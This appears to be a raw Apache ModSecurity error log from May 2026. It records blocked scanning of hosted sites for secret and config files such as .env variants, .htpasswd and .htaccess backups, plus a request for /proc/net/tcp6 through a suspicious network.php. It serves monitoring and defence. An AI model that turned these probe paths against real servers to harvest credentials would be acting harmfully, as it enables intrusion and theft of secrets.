[Mon May 11 12:03:25.069063 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:52292] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env.test.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/email/.env.test.rc1"] [unique_id "agGpbUYQeUtAPynIs6xcVAAAAAU"]
[Mon May 11 12:03:25.069291 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:52292] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/email/.env.test.rc1"] [unique_id "agGpbUYQeUtAPynIs6xcVAAAAAU"]
[Mon May 11 12:03:26.236804 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:52292] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpbUYQeUtAPynIs6xcVAAAAAU"]
[Mon May 11 12:03:26.263009 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:52296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env.test.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/email/.env.test.rc1"] [unique_id "agGpbkRdw2n9wv6Ai48LSgAAAJY"]
[Mon May 11 12:03:26.263463 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:52296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/email/.env.test.rc1"] [unique_id "agGpbkRdw2n9wv6Ai48LSgAAAJY"]
[Mon May 11 12:03:27.484775 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:52296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpbkRdw2n9wv6Ai48LSgAAAJY"]
[Mon May 11 12:03:32.935036 2026] [authz_core:error] [pid 1254133:tid 1254136] [client 95.111.239.37:58431] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 12:03:47.011438 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:43360] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /fastapi/.htpasswd.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/fastapi/.htpasswd.temp"] [unique_id "agGpg74KNmD_mZ_vlf89VwAAAEM"]
[Mon May 11 12:03:47.011660 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:43360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/fastapi/.htpasswd.temp"] [unique_id "agGpg74KNmD_mZ_vlf89VwAAAEM"]
[Mon May 11 12:03:48.170227 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:43360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpg74KNmD_mZ_vlf89VwAAAEM"]
[Mon May 11 12:03:48.196649 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:43364] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /fastapi/.htpasswd.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/fastapi/.htpasswd.temp"] [unique_id "agGphL4KNmD_mZ_vlf89WgAAAEw"]
[Mon May 11 12:03:48.196856 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:43364] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/fastapi/.htpasswd.temp"] [unique_id "agGphL4KNmD_mZ_vlf89WgAAAEw"]
[Mon May 11 12:03:49.405656 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:43364] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGphL4KNmD_mZ_vlf89WgAAAEw"]
[Mon May 11 12:04:01.495398 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:10810] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /flask/.env.debug.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/flask/.env.debug.alpha"] [unique_id "agGpkb4KNmD_mZ_vlf89ZgAAAE8"]
[Mon May 11 12:04:01.495617 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:10810] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/flask/.env.debug.alpha"] [unique_id "agGpkb4KNmD_mZ_vlf89ZgAAAE8"]
[Mon May 11 12:04:02.650545 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:10810] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpkb4KNmD_mZ_vlf89ZgAAAE8"]
[Mon May 11 12:04:02.676797 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:10822] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /flask/.env.debug.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/flask/.env.debug.alpha"] [unique_id "agGpkhjZymfuKpjWXeiBCAAAANg"]
[Mon May 11 12:04:02.677015 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:10822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/flask/.env.debug.alpha"] [unique_id "agGpkhjZymfuKpjWXeiBCAAAANg"]
[Mon May 11 12:04:03.907515 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:10822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpkhjZymfuKpjWXeiBCAAAANg"]
[Mon May 11 12:04:12.028918 2026] [security2:error] [pid 1254133:tid 1254143] [client 216.73.216.110:3703] ModSecurity: Warning. Matched phrase "proc/net/tcp" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/net/tcp found within ARGS:filesrc: /proc/net/tcp6"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpnBjZymfuKpjWXeiBDwAAAMc"]
[Mon May 11 12:04:12.029542 2026] [security2:error] [pid 1254133:tid 1254143] [client 216.73.216.110:3703] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpnBjZymfuKpjWXeiBDwAAAMc"]
[Mon May 11 12:04:12.121546 2026] [security2:error] [pid 1254133:tid 1254143] [client 216.73.216.110:3703] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpnBjZymfuKpjWXeiBDwAAAMc"]
[Mon May 11 12:04:50.234406 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:23676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gatsby/.env.save-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/gatsby/.env.save-hotfix"] [unique_id "agGpwkYQeUtAPynIs6xcxwAAAAs"]
[Mon May 11 12:04:50.234621 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:23676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/gatsby/.env.save-hotfix"] [unique_id "agGpwkYQeUtAPynIs6xcxwAAAAs"]
[Mon May 11 12:04:52.280123 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:23676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpwkYQeUtAPynIs6xcxwAAAAs"]
[Mon May 11 12:04:52.308197 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:23682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gatsby/.env.save-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/gatsby/.env.save-hotfix"] [unique_id "agGpxBjZymfuKpjWXeiBdgAAANg"]
[Mon May 11 12:04:52.308424 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:23682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/gatsby/.env.save-hotfix"] [unique_id "agGpxBjZymfuKpjWXeiBdgAAANg"]
[Mon May 11 12:04:54.816984 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:23682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpxBjZymfuKpjWXeiBdgAAANg"]
[Mon May 11 12:05:03.381069 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:25856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env.staging-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/gcp/.env.staging-old"] [unique_id "agGpz2S6k_SCYd1AVZqytgAAARU"]
[Mon May 11 12:05:03.381457 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:25856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/gcp/.env.staging-old"] [unique_id "agGpz2S6k_SCYd1AVZqytgAAARU"]
[Mon May 11 12:05:05.772983 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:25856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpz2S6k_SCYd1AVZqytgAAARU"]
[Mon May 11 12:05:05.797872 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:25866] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env.staging-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/gcp/.env.staging-old"] [unique_id "agGp0ZkIEwRJMyDaV55SkAAAAUc"]
[Mon May 11 12:05:05.798428 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:25866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/gcp/.env.staging-old"] [unique_id "agGp0ZkIEwRJMyDaV55SkAAAAUc"]
[Mon May 11 12:05:07.846547 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:25866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGp0ZkIEwRJMyDaV55SkAAAAUc"]
[Mon May 11 12:05:44.895218 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:21846] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /go/.htaccess_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/go/.htaccess_old"] [unique_id "agGp-ERdw2n9wv6Ai48L0QAAAIU"]
[Mon May 11 12:05:44.895661 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:21846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/go/.htaccess_old"] [unique_id "agGp-ERdw2n9wv6Ai48L0QAAAIU"]
[Mon May 11 12:05:46.092739 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:21846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGp-ERdw2n9wv6Ai48L0QAAAIU"]
[Mon May 11 12:05:46.119118 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:21862] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /go/.htaccess_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/go/.htaccess_old"] [unique_id "agGp-pkIEwRJMyDaV55SrwAAAVE"]
[Mon May 11 12:05:46.119605 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:21862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/go/.htaccess_old"] [unique_id "agGp-pkIEwRJMyDaV55SrwAAAVE"]
